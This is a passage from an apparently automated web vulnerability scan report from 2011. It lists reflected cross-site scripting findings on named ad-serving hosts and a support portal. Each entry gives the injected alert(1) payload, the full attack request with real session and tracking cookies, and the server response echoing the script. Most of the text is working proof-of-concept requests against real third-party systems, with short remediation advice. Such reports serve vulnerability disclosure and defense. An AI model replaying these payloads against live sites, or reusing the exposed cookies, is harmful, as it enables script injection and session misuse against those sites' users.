Set-Cookie: JSESSIONID=99E968F6C4A31A3325A220CFA2D7A833; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:31:59 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639306ae"-alert(1)-"7022657cf22",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "4b1a4ac0-0429-11e1-8dd7-00259036a3ce"
};


(function
...[SNIP]...

3.51. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67253"-alert(1)-"ef60871d9b9 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$67253"-alert(1)-"ef60871d9b9&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7F4663C198D0BB0547DCD36B6B1AA789; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:31:59 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$67253"-alert(1)-"ef60871d9b9&r=0.8418303478637639",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "4af7a783-0429-11e1-8dd7-002590
...[SNIP]...

3.52. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [time parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72cbe"-alert(1)-"0d58657472 was submitted in the time parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-572cbe"-alert(1)-"0d58657472&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=65F5E597A488065BF0B9A3F95C11853B; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:31:58 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-572cbe"-alert(1)-"0d58657472&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPho
...[SNIP]...

3.53. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca2cc'-alert(1)-'ca99a4bfd79 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=27180&pixId=41&ran=0.9659724633679442&pageURL=http://www.politico.com/ca2cc'-alert(1)-'ca99a4bfd79 HTTP/1.1
Host: image3.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: KRTBCOOKIE_100=4065-y9dly9jlztlwn; PUBRETARGET=2114_1327977633.82_1407375680.461_1407376052.78_1408030145.390_1321207886.1553_1410878111.806_1347381745.2404_1335025436; KRTBCOOKIE_22=488-pcv:1|uid:3827355846744503244; KRTBCOOKIE_32=1386-WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D; KRTBCOOKIE_57=476-uid:2230616255569715877; PUBMDCID=1; KADUSERCOOKIE=9E293B5B-EC08-48B0-9EB4-B19C8654FBE6; KRTBCOOKIE_80=1336-fabab561-e2c9-4030-a70b-8b4142c28f31.; KRTBCOOKIE_148=1699-uid:439524AE9E11374EB2C0C71740C604; KRTBCOOKIE_53=424-f4ed396e-81e1-46ef-82e5-3c1d998c2fa0; KRTBCOOKIE_89=4485-uid:ABJeb1_ZsvoMkSDqqlTuxjqemm6tC_Mb1oaofvaW1kegGSGtSCgyAiueAoqRVIIuCR4iLDkL9aYyBbywYlblrxDoJVWM--ho-A; pubfreq_27181=; pubtime_27181=TMC; pubfreq_27181_22456_1912778120=165-1; PMDTSHR=cat:; pubfreq_27181_22236_1608688478=325-1; KTPCACOOKIE=YES; pubfreq_27181_22457_396615642=165-1; pubfreq_27181_22238_596001637=893-1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 01:29:45 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 513

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/27180/41/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
o" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=41&pubId=27180&ran=0.9659724633679442&pmoo=0&pageURL=http://www.politico.com/ca2cc'-alert(1)-'ca99a4bfd79">
...[SNIP]...

3.54. http://image3.pubmatic.com/AdServer/UPug [ran parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the ran request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0a58'-alert(1)-'37205a44657 was submitted in the ran parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=27180&pixId=41&ran=0.9659724633679442a0a58'-alert(1)-'37205a44657&pageURL=http://www.politico.com/ HTTP/1.1
Host: image3.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: KRTBCOOKIE_100=4065-y9dly9jlztlwn; PUBRETARGET=2114_1327977633.82_1407375680.461_1407376052.78_1408030145.390_1321207886.1553_1410878111.806_1347381745.2404_1335025436; KRTBCOOKIE_22=488-pcv:1|uid:3827355846744503244; KRTBCOOKIE_32=1386-WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D; KRTBCOOKIE_57=476-uid:2230616255569715877; PUBMDCID=1; KADUSERCOOKIE=9E293B5B-EC08-48B0-9EB4-B19C8654FBE6; KRTBCOOKIE_80=1336-fabab561-e2c9-4030-a70b-8b4142c28f31.; KRTBCOOKIE_148=1699-uid:439524AE9E11374EB2C0C71740C604; KRTBCOOKIE_53=424-f4ed396e-81e1-46ef-82e5-3c1d998c2fa0; KRTBCOOKIE_89=4485-uid:ABJeb1_ZsvoMkSDqqlTuxjqemm6tC_Mb1oaofvaW1kegGSGtSCgyAiueAoqRVIIuCR4iLDkL9aYyBbywYlblrxDoJVWM--ho-A; pubfreq_27181=; pubtime_27181=TMC; pubfreq_27181_22456_1912778120=165-1; PMDTSHR=cat:; pubfreq_27181_22236_1608688478=325-1; KTPCACOOKIE=YES; pubfreq_27181_22457_396615642=165-1; pubfreq_27181_22238_596001637=893-1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 01:29:31 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 513

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/27180/41/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
nheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=41&pubId=27180&ran=0.9659724633679442a0a58'-alert(1)-'37205a44657&pmoo=0&pageURL=http://www.politico.com/">
...[SNIP]...

3.55. http://mediaservices-d.openxenterprise.com/w/1.0/afr [auid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mediaservices-d.openxenterprise.com
Path:   /w/1.0/afr

Issue detail

The value of the auid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc65c'-alert(1)-'3cfef65f846 was submitted in the auid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /w/1.0/afr?auid=36824cc65c'-alert(1)-'3cfef65f846&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25 HTTP/1.1
Host: mediaservices-d.openxenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?mi=fbe566bc-e601-4d14-a2ef-601df1907cf9&mn=0&mc=1&cc=1&auid=36821&cb=39316621
Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m; Version=1; Expires=Wed, 31 Oct 2012 02:15:21 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic)
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Tue, 01 Nov 2011 02:15:21 GMT
Content-Type: text/html
Content-Length: 683
Cache-Control: private, max-age=0, no-cache
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><base target="_top" /><script type="text/javascript">setTimeout('window.location.replace("http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824cc65c'-alert(1)-'3cfef65f846&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&rc=11")', 60*1000);</script>
...[SNIP]...

3.56. http://mediaservices-d.openxenterprise.com/w/1.0/afr [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mediaservices-d.openxenterprise.com
Path:   /w/1.0/afr

Issue detail

The value of the cb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb9af'-alert(1)-'8c83aaf82f3 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HEREcb9af'-alert(1)-'8c83aaf82f3&rd=60&rm=25 HTTP/1.1
Host: mediaservices-d.openxenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?mi=fbe566bc-e601-4d14-a2ef-601df1907cf9&mn=0&mc=1&cc=1&auid=36821&cb=39316621
Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m; Version=1; Expires=Wed, 31 Oct 2012 02:16:05 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic)
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Tue, 01 Nov 2011 02:16:05 GMT
Content-Type: text/html
Content-Length: 1393
Cache-Control: private, max-age=0, no-cache
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><base target="_top" /><script type="text/javascript">setTimeout('window.location.replace("http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HEREcb9af'-alert(1)-'8c83aaf82f3&rd=60&rm=25&rc=11")', 60*1000);</script>
...[SNIP]...

3.57. http://mediaservices-d.openxenterprise.com/w/1.0/afr [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mediaservices-d.openxenterprise.com
Path:   /w/1.0/afr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dce2b'-alert(1)-'e933e1773f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&dce2b'-alert(1)-'e933e1773f2=1 HTTP/1.1
Host: mediaservices-d.openxenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?mi=fbe566bc-e601-4d14-a2ef-601df1907cf9&mn=0&mc=1&cc=1&auid=36821&cb=39316621
Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m; Version=1; Expires=Wed, 31 Oct 2012 02:18:25 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic)
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Tue, 01 Nov 2011 02:18:25 GMT
Content-Type: text/html
Content-Length: 2435
Cache-Control: private, max-age=0, no-cache
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><base target="_top" /><script type="text/javascript">setTimeout('window.location.replace("http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&dce2b'-alert(1)-'e933e1773f2=1&rc=11")', 60*1000);</script>
...[SNIP]...

3.58. http://mediaservices-d.openxenterprise.com/w/1.0/afr [rm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mediaservices-d.openxenterprise.com
Path:   /w/1.0/afr

Issue detail

The value of the rm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b628'-alert(1)-'9b6b7bb68d4 was submitted in the rm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=254b628'-alert(1)-'9b6b7bb68d4 HTTP/1.1
Host: mediaservices-d.openxenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?mi=fbe566bc-e601-4d14-a2ef-601df1907cf9&mn=0&mc=1&cc=1&auid=36821&cb=39316621
Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m; Version=1; Expires=Wed, 31 Oct 2012 02:17:13 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic)
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Tue, 01 Nov 2011 02:17:13 GMT
Content-Type: text/html
Content-Length: 1393
Cache-Control: private, max-age=0, no-cache
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><base target="_top" /><script type="text/javascript">setTimeout('window.location.replace("http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=254b628'-alert(1)-'9b6b7bb68d4&rc=11")', 60*1000);</script>
...[SNIP]...

3.59. https://portal.teamsupport.com/Telerik.Web.UI.WebResource.axd [_TSM_HiddenField_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://portal.teamsupport.com
Path:   /Telerik.Web.UI.WebResource.axd

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5e01'%3balert(1)//6c699322ab6 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as c5e01';alert(1)//6c699322ab6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Telerik.Web.UI.WebResource.axd?_TSM_HiddenField_=RadScriptManager1_HiddenFieldc5e01'%3balert(1)//6c699322ab6&compress=1&_TSM_CombinedScripts_=%3b%3bSystem.Web.Extensions%2c+Version%3d3.5.0.0%2c+Culture%3dneutral%2c+PublicKeyToken%3d31bf3856ad364e35%3aen-US%3afec40ae8-2c1f-4db6-96ca-d6c61af2dc7f%3aea597d4b%3ab25378d2%3bTelerik.Web.UI%2c+Version%3d2008.3.1314.35%2c+Culture%3dneutral%2c+PublicKeyToken%3d121fae78165ba3d4%3aen-US%3aef502ffb-86f7-4d96-ad3a-fbb934d602ab%3a16e4e7cd%3a68f76a79%3a874f8ea2%3a2a2fc429%3aa585d0d4 HTTP/1.1
Host: portal.teamsupport.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://portal.teamsupport.com/BasicPortal.aspx?OrganizationID=305383
Cookie: ASP.NET_SessionId=q5cuoojovmirb4451hesgsbt

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 241912
Content-Type: application/x-javascript
Expires: Tue, 30 Oct 2012 19:14:44 GMT
Last-Modified: Fri, 16 Sep 2011 17:57:43 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR CUR TAI PSA IVA IVD HIS OUR DEL SAM OTR UNR STP UNI"
Date: Mon, 31 Oct 2011 19:14:43 GMT

/* START MicrosoftAjax.js */
//----------------------------------------------------------
// Copyright (C) Microsoft Corporation. All rights reserved.
//--------------------------------------------
...[SNIP]...
Control);


/* END Telerik.Web.UI.Upload.RadUpload.js */
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {if(!$get('RadScriptManager1_HiddenFieldc5e01';alert(1)//6c699322ab6')) return; $get('RadScriptManager1_HiddenFieldc5e01';alert(1)//6c699322ab6').value += ';;System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35:en-US:fec40ae8-2c1f-4d
...[SNIP]...

3.60. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12df5'-alert(1)-'78a7bb69b97 was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27180&siteId=27181&adId=22456&kadwidth=728&kadheight=90&kbgColor=686C6F&ktextColor=171717&klinkColor=004276&pageURL=http://www.politico.com/&frameName=http_www_politico_comkomli_ads_frame1271802718112df5'-alert(1)-'78a7bb69b97&kltstamp=2011-9-31%2020%3A28%3A51&ranreq=0.7080080761587771&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=25x549&adVisibility=3 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: KRTBCOOKIE_100=4065-y9dly9jlztlwn; PUBRETARGET=2114_1327977633.82_1407375680.461_1407376052.78_1408030145.390_1321207886.1553_1410878111.806_1347381745.2404_1335025436; KRTBCOOKIE_22=488-pcv:1|uid:3827355846744503244; KRTBCOOKIE_32=1386-WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D; KRTBCOOKIE_57=476-uid:2230616255569715877; PUBMDCID=1; KADUSERCOOKIE=9E293B5B-EC08-48B0-9EB4-B19C8654FBE6; KRTBCOOKIE_80=1336-30ca355a-b54e-4ba3-ac44-7046f2c4ef85.; KRTBCOOKIE_148=1699-uid:439524AE9E11374EB2C0C71740C604; KRTBCOOKIE_53=424-f4ed396e-81e1-46ef-82e5-3c1d998c2fa0; PMAT=0; KRTBCOOKIE_89=4485-uid:ABJeb1_ZsvoMkSDqqlTuxjqemm6tC_Mb1oaofvaW1kegGSGtSCgyAiueAoqRVIIuCR4iLDkL9aYyBbywYlblrxDoJVWM--ho-A

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1795
Date: Tue, 01 Nov 2011 01:29:28 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Wed, 31-Oct-2012 01:29:27 GMT; path=/
Set-Cookie: pubfreq_27181_22456_1169761361=165-1; domain=pubmatic.com; expires=Tue, 01-Nov-2011 02:09:28 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Wed, 02-Nov-2011 01:29:28 GMT; path=/

